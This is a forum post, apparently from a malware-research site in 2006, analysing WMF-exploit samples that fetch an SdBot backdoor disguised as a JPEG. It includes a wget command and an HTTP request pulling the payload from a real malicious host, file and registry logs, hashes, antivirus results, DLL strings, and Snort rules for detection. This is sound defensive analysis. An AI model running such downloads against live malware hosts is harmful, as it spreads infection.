Skip navigation.
Home

more win_wmf

| |

Thanks to seville we have more wmf stuff. These go out to a site and download a new file.
Heres some pretty pictures:



So sdbot05b.jpg gets turned into command.pif

GET /sdbot05b.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: charmedmadgic.free.fr
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2006 05:24:45 GMT
Server: Apache/ProXad [Sep  2 2005 07:02:45]
Last-Modified: Sat, 31 Dec 2005 21:55:15 GMT
ETag: "9ea779-d134-43b6fe43"
Content-Length: 53556
Content-Type: image/jpeg



C:\malware>wget --user-agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
--00:10:27--  http://charmedmadgic.free.fr/sdbot05b.jpg
           => `sdbot05b.jpg'
Resolving charmedmadgic.free.fr... done.
Connecting to charmedmadgic.free.fr[212.27.63.117]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 53,556 [image/jpeg]

100%[====================================>] 53,556        24.98K/s    ETA 00:00

00:10:30 (24.98 KB/s) - `sdbot05b.jpg' saved [53556/53556]



FIRST PACKET
0000   00 06 25 62 de 56 00 0c 29 7e 41 d5 08 00 45 00  ..%b.V..)~A...E.
0010   00 30 3e d5 40 00 80 06 e6 53 c0 a8 01 66 d4 1b  .0>.@....S...f..
0020   3f 75 04 e9 00 50 59 73 42 34 00 00 00 00 70 02  ?u...PYsB4....p.
0030   fa f0 11 af 00 00 02 04 05 b4 01 01 04 02        ..............


212.27.63.117 TCP 1257 > 80

FIRST CHUNK OF  FILE:

MZKERNEL32.DLL..PE..L......@..P.v4.|H.....LoadLibraryA...........`....@...............9..........P.................................
............A..............v8.P.>..@M.j'Y...v.............GetProcAddress.......


CREATED FILES:
2915	10:24:46 PM	cscript.exe:1520	CREATE	C:\Documents and Settings\macdaddy\Local Settings\Temporary Internet Files\Content.IE5\Y1SKCUOY\sdbot05b[1].jpg	SUCCESS	Options: Create  Access: All	
3683	10:24:48 PM	cscript.exe:1520	CREATE	C:\command.pif	SUCCESS	Options: OverwriteIf Sequential  Access: All	
4459	10:24:48 PM	command.pif:512	CREATE	C:\WINDOWS\System32\taskdrv32.exe	SUCCESS	Options: OverwriteIf Sequential  Access: All	

WRITTEN FILES:
10:24:44 PM	cmd.exe:596	WRITE 	C:\dl.vbs	SUCCESS	Offset: 0 Length: 173	
10:24:45 PM	dwwin.exe:192	WRITE 	C:\DOCUME~1\macdaddy\LOCALS~1\Temp\58B624.dmp	SUCCESS	Offset: 0 Length: 32	
10:24:46 PM	cscript.exe:1520	WRITE 	C:\Documents and Settings\macdaddy\Local Settings\Temporary Internet Files\Content.IE5\Y1SKCUOY\sdbot05b[1].jpg	SUCCESS	Offset: 0 Length: 797	
10:24:48 PM	cscript.exe:1520	WRITE 	C:\command.pif	SUCCESS	Offset: 0 Length: 2048	
10:24:48 PM	cmd.exe:596	WRITE 	C:\command.pif	SUCCESS	Offset: 0 Length: 57344	
10:24:48 PM	command.pif:512	WRITE 	C:\WINDOWS\System32\taskdrv32.exe	SUCCESS	Offset: 0 Length: 53556	

REGISTRY ENTRIES

1000    8.65035343      cscript.exe:1520        CreateKey       HKLM\SOFTWARE\Microsoft\Cryptography\RNG        SUCCESS Access: 0x2
1058    8.65464306      cscript.exe:1520        CreateKey       HKLM\Software\Microsoft\Windows Script Host\Settings    SUCCESS Access: 0x20019
1315    8.70439243      cscript.exe:1520        CreateKey       HKCU\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing     SUCCESS Access: 0x20019
1866    9.42009163      cscript.exe:1520        CreateKey       HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings        SUCCESS Access: 0x2001F
1906    9.42257881      cscript.exe:1520        CreateKey       HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders      SUCCESS Access: 0x2000000
2892    9.51492786      cscript.exe:1520        CreateKey       HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon      SUCCESS Access: 0x2001F
3030    9.52157402      cscript.exe:1520        CreateKey       HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders   SUCCESS Access: 0x2000000
3047    9.52200317      cscript.exe:1520        CreateKey       HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections    SUCCESS Access: 0x1
3064    9.52283478      cscript.exe:1520        CreateKey       HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections    SUCCESS Access: 0x2
3190    9.52878380      cscript.exe:1520        CreateKey       HKLM\System\CurrentControlSet\Services\Tcpip\Parameters SUCCESS Access: 0x20019
5639    13.02172852     command.pif:512 CreateKey       HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings        SUCCESS Access: 0x2001F
5731    13.02852345     command.pif:512 CreateKey       HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders      SUCCESS Access: 0x2000000
5734    13.02862072     command.pif:512 CreateKey       HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders   SUCCESS Access: 0x2000000
5943    13.04866695     command.pif:512 CreateKey       HKLM\System\CurrentControlSet\Services\Tcpip\Parameters SUCCESS Access: 0x20019
6656    13.37349129     taskdrv32.exe:1236      CreateKey       HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings        SUCCESS Access: 0x2001F


NEW PROCESS

iedld32.dll


bg_wmf.evil
434017cc7591950ab0378d464fb03f97
c8996a4a1ae88ff06f2b94812ad461d554584cb8
83984c8fdba4fdfacd9c74060200475eb92d6639f0dd05b4992bf24e9c7cf496

AntVir	Found Exploit/IMG.WMF exploit
ArcaVir Found Trojan.Downloader.Agent.Acd
Avast 	Found Win32:Exdown
AVG Antivirus 	Found nothing
BitDefender 	Found Exploit.Win32.WMF-PFV
ClamAV 	Found Exploit.WMF.A
Dr.Web 	Found nothing
F-Prot Antivirus	Found nothing
Fortinet 	Found W32/WMF-exploit
Kaspersky Anti-Virus 	Found Exploit.Win32.IMG-WMF (probable variant)
NOD32 	Found Win32/TrojanDownloader.Wmfex
Norman Virus Control 	Found nothing
UNA 	Found nothing
VBA32 	Found nothing


foto_wmf.evil
62589a55c684debd42e88675875fee5a
2fff2d0f80d802ebbdf187c931b735997a079737
07d6b0de82e129701c2de81764beeb8667bbe52fb8e9a34314a9f09775345b76

AntiVir  	Found Exploit/IMG.WMF exploit
ArcaVir 	Found nothing
Avast 	Found Win32:Exdown
AVG Antivirus 	Found nothing
BitDefender 	Found Exploit.Win32.WMF-PFV
ClamAV 	Found Exploit.WMF.A
Dr.Web 	Found nothing
F-Prot Antivirus	Found security risk or a "backdoor" program
Fortinet 	Found W32/WMF-exploit
Kaspersky Anti-Virus 	Found Exploit.Win32.IMG-WMF (probable variant)
NOD32 	Found Win32/TrojanDownloader.Wmfex
Norman Virus Control 	Found nothing
UNA 	Found nothing
VBA32 	Found Trojan-Downloader.Win32.Agent.acd 


command.pif
47e7a160296eab339c615f8cb4e4cbc6
d2715bc39a44e250f05f2ed77f30173b78cbab0d
107c830f6914e4c3264bf5fc56ce9ff22a920971d87b3dcc6f6d9095e2b2ccd8

AntiVir  	Found nothing
ArcaVir 	Found Win32
Avast 	Found nothing
AVG Antivirus 	Found IRC/BackDoor.SdBot.SCA
BitDefender 	Found nothing
ClamAV 	Found nothing
Dr.Web 	Found nothing
F-Prot Antivirus Found W32/Sdbot.NZJ
Fortinet 	Found nothing
Kaspersky Anti-Virus 	Found Backdoor.Win32.SdBot.gen
NOD32 	Found probably a variant of Win32/Rbot (probable variant)
Norman Virus Control 	Found W32/SDBot.VTZ
UNA 	Found nothing
VBA32 	Found Backdoor.Win32.SdBot.gen 


sdbot05b.jpg
47e7a160296eab339c615f8cb4e4cbc6
d2715bc39a44e250f05f2ed77f30173b78cbab0d
107c830f6914e4c3264bf5fc56ce9ff22a920971d87b3dcc6f6d9095e2b2ccd8

cscript.exe
00f7e24a0be30a4fe529802c939a9291
bc6a4f2420db34ad83279063b652bdf8fec0ccc3
cd9ac5b63bb9f6e616fdd576fb81d9375099d00ed339abc9ae433fdb6b459ce1

iedld32.dll
1a568c2a4bb4d3c967286dcf257ce260
e21eb387ef31d0474d1f327bcee2d6ccde117e83
edcc477514c0c340fb3a4f815f01ca01785623d608f3d441f3526f5ab57b3789

AntiVir  	Found nothing
ArcaVir 	Found nothing
Avast 	Found nothing
AVG Antivirus 	Found nothing
BitDefender 	Found nothing
ClamAV 	Found nothing
Dr.Web 	Found DLOADER.Trojan (probable variant)
F-Prot Antivirus	Found nothing
Fortinet 	Found nothing
Kaspersky Anti-Virus 	Found nothing
NOD32 	Found nothing
Norman Virus Control 	Found nothing
UNA 	Found nothing
VBA32 	Found Downloader.Small.54 (probable variant) 

STRINGS for iedld32.dll

0000004D   1000004D      0   !This program cannot be run in DOS mode.
000000A8   100000A8      0   Rich5
000001C0   100001C0      0   .text
00000210   10000210      0   .rdata
00000237   10000237      0   @.data
00000260   10000260      0   .reloc
00001B92   10004192      0   CloseHandle
00001BA0   100041A0      0   CreateFileA
00001BAE   100041AE      0   CreateProcessA
00001BC0   100041C0      0   CreateThread
00001BD0   100041D0      0   GetComputerNameA
00001BE4   100041E4      0   GetCurrentProcessId
00001BFA   100041FA      0   GetFileAttributesA
00001C10   10004210      0   GetFileSize
00001C1E   1000421E      0   GetFullPathNameA
00001C32   10004232      0   GetLocaleInfoA
00001C44   10004244      0   GetModuleFileNameA
00001C5A   1000425A      0   GetModuleHandleA
00001C6E   1000426E      0   GetProcAddress
00001C80   10004280      0   GetSystemDirectoryA
00001C96   10004296      0   GetTickCount
00001CA6   100042A6      0   GetVersionExA
00001CB6   100042B6      0   GetVolumeInformationA
00001CCE   100042CE      0   HeapAlloc
00001CDA   100042DA      0   HeapCreate
00001CE8   100042E8      0   HeapDestroy
00001CF6   100042F6      0   HeapFree
00001D02   10004302      0   MoveFileExA
00001D10   10004310      0   RtlMoveMemory
00001D20   10004320      0   VirtualAlloc
00001D30   10004330      0   VirtualFree
00001D3E   1000433E      0   VirtualProtect
00001D50   10004350      0   WaitForSingleObject
00001D66   10004366      0   WideCharToMultiByte
00001D7C   1000437C      0   WriteFile
00001D88   10004388      0   WritePrivateProfileStringA
00001DA6   100043A6      0   lstrcatA
00001DB2   100043B2      0   lstrcpyA
00001DBE   100043BE      0   lstrlenA
00001DC8   100043C8      0   KERNEL32.dll
00001DD8   100043D8      0   wsprintfA
00001DE4   100043E4      0   CallNextHookEx
00001DF6   100043F6      0   CharLowerA
00001E04   10004404      0   CharUpperA
00001E12   10004412      0   SetWindowsHookExA
00001E26   10004426      0   UnhookWindowsHookEx
00001E3A   1000443A      0   USER32.dll
00001EA0   100044A0      0   hidefile.dll
00001EAD   100044AD      0   InitDownloader
00001EBC   100044BC      0   MessageHandler
00001ECB   100044CB      0   SwitchOff
00001ED5   100044D5      0   SwitchOn
00002008   10005008      0   NTDLL.DLL
00002012   10005012      0   NtClose
0000201A   1000501A      0   NtOpenFile
00002025   10005025      0   NtOpenProcess
00002033   10005033      0   NtQueryDirectoryFile
00002048   10005048      0   NtQuerySystemInformation
00002061   10005061      0   NtQueryInformationProcess
0000207B   1000507B      0   NtReadVirtualMemory
0000208F   1000508F      0   RtlInitUnicodeString
000020A4   100050A4      0   strcmp
000020CF   100050CF      0   KERNEL32.DLL
000020DC   100050DC      0   FindNextFileA
000020EA   100050EA      0   Process32Next
000020F8   100050F8      0   RegisterServiceProcess
0000210F   1000510F      0   lstrcmpA
00002174   10005174      0   WININET.DLL
00002184   10005184      0   InternetGetConnectedState
0000219E   1000519E      0   InternetCloseHandle
000021B2   100051B2      0   InternetOpenA
000021C0   100051C0      0   InternetOpenUrlA
000021D1   100051D1      0   InternetSetFilePointer
000021E8   100051E8      0   InternetReadFile
00002211   10005211      0   IEXPLORE.EXE
0000232E   1000532E      0   Rename
00002335   10005335      0   WININIT.INI
00002341   10005341      0   userid=

Oink!

# General - any port 80 to known bad www server
alert tcp $HOME_NET any -> 212.27.63.117 80 (msg:"[OFFENSIVE COMPUTING] HTTP connection to known malware provider for WMF exploit";sid:66600003;rev:1;)

# Specific to server and file name
alert tcp $HOME_NET any -> 212.27.63.117 80 (msg:"[OFFENSIVE COMPUTING] HTTP connection to known malware provider downloading sdbot05b.jpg for WMF exploit";content:"sdbot05b.jpg";nocase;sid:66600004;rev:1;)

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior

SANS suggest blocking

----
"I hate block lists... maybe because I have been on the 'wrong end' of them in the past. But after careful consideration, we do recommend blocking traffic from these two netblocks:

InterCage Inc.: 69.50.160.0/19 (69.50.160.0 - 69.50.191.255)
Inhoster: 85.255.112.0/20 (85.255.112.0 - 85.255.127.255)

--------------
This is different from the 212.27.63.117 mentioned above.

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior

Just in case ....

In case you run into a layer 8 problem when it comes to blocking ....

alert tcp $HOME_NET any -> [69.50.160.0/19,85.255.112.0/20] any (msg:"[OFFENSIVE COMPUTING] Traffic to naughty netblocks - MSF";refrence:url,http://isc.sans.org/diary.php?storyid=997;sid:66600005;rev:1;)

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior

Flow and spelling

Note: I used this but added a flow:to_server and the reference keyword is misspelled.

Thanks Delchi!

Thanks! I can't go back and

Thanks! I can't go back and edit it, but I'll come up with a repository option soon!

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior